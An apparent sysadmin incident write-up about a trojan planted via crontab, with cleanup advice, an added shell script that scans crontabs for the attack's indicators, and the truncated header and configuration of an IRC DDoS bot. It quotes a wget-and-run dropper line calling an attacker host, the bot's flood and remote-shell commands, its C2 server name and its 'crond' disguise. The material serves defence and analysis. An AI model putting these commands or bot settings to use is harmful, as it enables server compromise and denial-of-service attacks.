Date: 2014-05-16 (20625 views)
A few days ago a trojan was planted on one of our company servers. As soon as it ran it opened a large number of outbound connections and saturated the link, taking the whole internal network down. The way it was planted is very simple: the attacker only had to add the following two entries to the Linux crond scheduler:
[root@localhost tmp]# crontab -l
* * * * * /root/.zxc >/dev/null 2>&1
@weekly wget -q http://stablehost.us/bots/regular.bot -O /tmp/.a;chmod +x /tmp/.a;sh /tmp/.a >/dev/null 2>&1
The first entry runs a hidden binary, /root/.zxc, every minute. The second, once a week, downloads a sh script from the attacker's site, marks it executable and runs it; that script downloads the trojan's source code, compiles it on the victim and starts it, after which the bot keeps sending packets outward. Note that `crontab -l` only lists the invoking user's crontab, so when cleaning up also check `crontab -l -u <user>` for every other account, /etc/crontab and /etc/cron.d, and remove the @weekly entry together with the binary, otherwise the dropper is fetched again the following week. The `>/dev/null 2>&1` redirections on both entries keep cron from mailing any output to the administrator. Readers who are interested can study the code below to see what the trojan is meant to do.
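As an added example (this is not code from the original post or from the trojan), the following POSIX sh script turns the two crontab entries above into detection rules and runs them over crontab text: a download-then-execute chain in a single entry, an executable hidden as a dotfile under a temp or home directory, an every-minute schedule, and silenced output. The indicator regexes, the function names and the SAMPLE_CRONTAB data (modeled on the listing above plus one benign entry) are constructed for this example; run it with `--system` to scan the real crontabs on a host.

```shell
#!/bin/sh
# Added example, not code from the original post: flag crontab entries that
# match the pattern seen in the incident (hidden dotfile run every minute,
# weekly wget-and-run dropper, output silenced). The indicator regexes and
# SAMPLE_CRONTAB below are constructed for this example.

# classify_cron_line LINE
# Prints a comma-separated list of indicators matched by one crontab line,
# or nothing if the line looks benign. Comments and blank lines are skipped.
classify_cron_line() {
    line=$1
    hits=""
    case "$line" in
        ''|\#*) return 0 ;;
    esac
    # 1. Download-and-execute chain: wget/curl plus chmod +x or a shell run
    #    of the fetched file inside the same entry.
    if printf '%s\n' "$line" | grep -Eq '(^|[;&| ])(wget|curl) ' &&
       printf '%s\n' "$line" | grep -Eq '(chmod [+]x|(^|[;&| ])(sh|bash) )'; then
        hits="${hits}fetch-and-exec,"
    fi
    # 2. Executable hidden as a dotfile under a temp or home directory
    #    (/tmp/.a and /root/.zxc in the listing above).
    if printf '%s\n' "$line" | grep -Eq '/(tmp|var/tmp|dev/shm|root|home/[^/ ]+)/\.[A-Za-z0-9_]+'; then
        hits="${hits}hidden-dotfile,"
    fi
    # 3. Runs every minute; legitimate every-minute jobs are rare enough to review.
    case "$line" in
        '* * * * * '*) hits="${hits}every-minute," ;;
    esac
    # 4. All output discarded, so cron never mails the admin about the job.
    case "$line" in
        *'>/dev/null 2>&1'*|*'> /dev/null 2>&1'*) hits="${hits}silenced-output," ;;
    esac
    printf '%s' "${hits%,}"
}

# scan_cron_text < CRONTAB_DUMP
# Prints "indicators<TAB>line" for every flagged entry read from stdin.
scan_cron_text() {
    while IFS= read -r entry || [ -n "$entry" ]; do
        tags=$(classify_cron_line "$entry")
        [ -n "$tags" ] && printf '%s\t%s\n' "$tags" "$entry"
    done
    return 0
}

# scan_system_crontabs
# Live scan of the places a cleanup has to check: the system crontab, the
# /etc/cron.d fragments and (when run as root) every user's crontab.
scan_system_crontabs() {
    for f in /etc/crontab /etc/cron.d/*; do
        [ -f "$f" ] && { printf '== %s\n' "$f"; scan_cron_text < "$f"; }
    done
    if [ "$(id -u)" -eq 0 ]; then
        cut -d: -f1 /etc/passwd | while IFS= read -r u; do
            out=$(crontab -l -u "$u" 2>/dev/null | scan_cron_text)
            [ -n "$out" ] && printf '== crontab of %s\n%s\n' "$u" "$out"
        done
    else
        crontab -l 2>/dev/null | scan_cron_text
    fi
}

# Constructed sample: the two entries from the post plus one benign job.
SAMPLE_CRONTAB='# m h dom mon dow command
* * * * * /root/.zxc >/dev/null 2>&1
@weekly wget -q http://stablehost.us/bots/regular.bot -O /tmp/.a;chmod +x /tmp/.a;sh /tmp/.a >/dev/null 2>&1
0 3 * * * /usr/bin/updatedb'

if [ "${1:-}" = "--system" ]; then
    scan_system_crontabs
else
    printf '%s\n' "$SAMPLE_CRONTAB" | scan_cron_text
fi
```

Against the sample data the script flags exactly the two malicious entries and leaves the updatedb job alone; the fetch-and-exec rule deliberately requires both a downloader and an execution step in the same entry, so a plain `wget` mirror job is not reported on its own.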
The trojan's source code is as follows (the listing on this page is cut off partway through the includes). The header comment shows that it is an IRC-controlled DDoS bot: it joins the configured channel and accepts flood commands (TSUNAMI, PAN, UDP, UNKNOWN) as well as remote shell execution (SH) and file download (GET), and the FAKENAME define makes the running process show up as "crond" so that it blends in next to the real cron daemon in a process listing.
/*
 * !* SH uname -a
 *
 * There are a number of commands that can be sent to the client:
 *
 * TSUNAMI <target> <secs>       = A PUSH+ACK flooder
 * PAN <target> <port> <secs>    = A SYN flooder
 * UDP <target> <port> <secs>    = An UDP flooder
 * UNKNOWN <target> <secs>       = Another non-spoof udp flooder
 * NICK <nick>                   = Changes the nick of the client
 * SERVER <server>               = Changes servers
 * GETSPOOFS                     = Gets the current spoofing
 * SPOOFS <subnet>               = Changes spoofing to a subnet
 * DISABLE                       = Disables all packeting from this bot
 * ENABLE                        = Enables all packeting from this bot
 * KILL                          = Kills the knight
 * GET <http address> <save as>  = Downloads a file off the web
 * VERSION                       = Requests version of knight
 * KILLALL                       = Kills all current packeting
 * HELP                          = Displays this
 * IRC <command>                 = Sends this command to the server
 * SH <command>                  = Executes a command
 *
 * Remember, all these commands must be prefixed by a ! and the nickname that
 * you want the command to be sent to (can include wildcards). There are no
 * spaces in between the ! and the nickname, and there are no spaces before
 * the !
 *
 * - contem on efnet
 *******************************************************************************/
////////////////////////////////////////////////////////////////////////////////
//                                  EDIT THESE                                //
////////////////////////////////////////////////////////////////////////////////
#define STARTUP                 // Start on startup?
#undef IDENT                    // Only enable this if you absolutely have to
#define FAKENAME "crond"        // What you want this to hide as
#define CHAN "#bsd"             // Channel to join
#define KEY "routers"           // The key of the channel
#define IRCPORT "6667"
int numservers=1;               // Must change this to equal number of servers down there
char *servers[] = {             // List the servers in that format, always end in (void*)0
    "linksys.secureshellz.net",
    (void*)0
};
////////////////////////////////////////////////////////////////////////////////
//                                  STOP HERE!                                //
////////////////////////////////////////////////////////////////////////////////
#include <stdarg.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#inclu